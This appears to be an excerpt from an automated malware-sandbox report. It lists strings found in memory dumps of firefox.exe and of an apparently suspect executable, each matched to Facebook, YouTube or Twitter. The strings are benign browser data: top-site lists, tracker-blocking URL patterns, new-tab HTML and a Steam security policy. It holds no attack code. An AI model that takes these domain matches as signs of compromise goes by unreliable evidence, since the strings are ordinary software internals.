Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details. equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details. equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details. equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E90C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E908000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E910000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2860117948.000002EE59D34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: gCustomizeMode.addToPanel(this.parentNode.triggerNode, 'panelitem-context')https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: gCustomizeMode.addToPanel(this.parentNode.triggerNode, 'panelitem-context')https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: gCustomizeMode.addToPanel(this.parentNode.triggerNode, 'panelitem-context')https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E95F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:_postUpdateProcessing - status is pending-elevate, but this is a silent startup, so the elevation window has been suppressed.https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/Downloader:onStopRequest - notifying observers of error. topic: update-error, status: download-attempts-exceeded, downloadAttempts: equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:_postUpdateProcessing - status is pending-elevate, but this is a silent startup, so the elevation window has been suppressed.https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/Downloader:onStopRequest - notifying observers of error. topic: update-error, status: download-attempts-exceeded, downloadAttempts: equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
